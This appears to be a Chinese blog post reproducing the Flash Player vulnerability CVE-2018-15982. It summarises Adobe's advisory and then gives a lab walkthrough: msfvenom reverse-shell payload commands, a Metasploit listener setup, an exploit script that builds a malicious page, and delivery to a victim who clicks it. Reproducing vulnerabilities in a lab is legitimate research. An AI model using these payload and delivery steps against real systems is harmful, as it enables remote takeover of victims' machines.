1. 程式人生 > >CVE-2018-15982漏洞復現

CVE-2018-15982漏洞復現

 

作者:歐根


 

漏洞資訊:CVE-2018-15982

Adobe已釋出適用於Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。這些更新解決一個  關鍵的  Adobe Flash Player的漏洞和一個  重要的  Adobe Flash Player的安裝程式的漏洞。成功利用可能導致當前使用者的上下文中的任意程式碼執行和許可權提升。

CVSSV3分數和漏洞型別:

受CVE-2018-15982影響的產品

產品

平臺

Adobe Flash Player桌面執行時

31.0.0.153及更早版本

Windows,macOS和Linux

適用於Google Chrome的Adobe Flash Player

31.0.0.153及更早版本

Windows,macOS,Linux和Chrome OS 

適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player

31.0.0.153及更早版本

Windows 10和8.1和win7/其他版本為測試

Adobe Flash Player安裝程式

08.0.0.108及更早版本

視窗

漏洞危害:

漏洞類別

漏洞影響

嚴重

CVE編號

免費使用

任意程式碼執行

危急

CVE-2018-15982 

修復方法:對adb flash進行升級

產品

平臺

優先

可用性

Adobe Flash Player桌面執行時

32.0.0.101

Windows,macOS

1

Flash Player下載中心

Flash Player分發

適用於Google Chrome的Adobe Flash Player

32.0.0.101

Windows,macOS,Linux和Chrome OS 

1

谷歌Chrome釋出

適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player

32.0.0.101

Windows 10和8.1

1

Microsoft安全通報

Adobe Flash Player桌面執行時

32.0.0.101

Linux的

3

Flash Player下載中心

Adobe Flash Player安裝程式

31.0.0.122

視窗

2

Flash Player下載中心

Flash Player分發


實驗環境

攻擊機:kali 2.0

受害機:win7 win10

使用工具

CVE-2018-0802_CVE-2017-11882-master exp

Msfconsole

1.建立payload程式

msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>64.bin

這裡會生成兩個bin檔案,分別為86bin和64bin估計是32位平臺和64位平臺

 

監聽payload

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

SET LPORT 6666

set LHOST 192.168.0.111

set RC4PASSWORD zale

生成檔案視訊檔案和網頁

python CVE_2018_15982.py -i 86.bin -I 64.bin

呼叫py檔案,生成攻擊網頁和視訊檔案

開啟apache服務

把上面生成的網頁和視訊放在web目錄中

發給受害機驗證是否成功

當受害者點選網頁時

可用清楚看到已經成功返回shell

至此漏洞復現結束!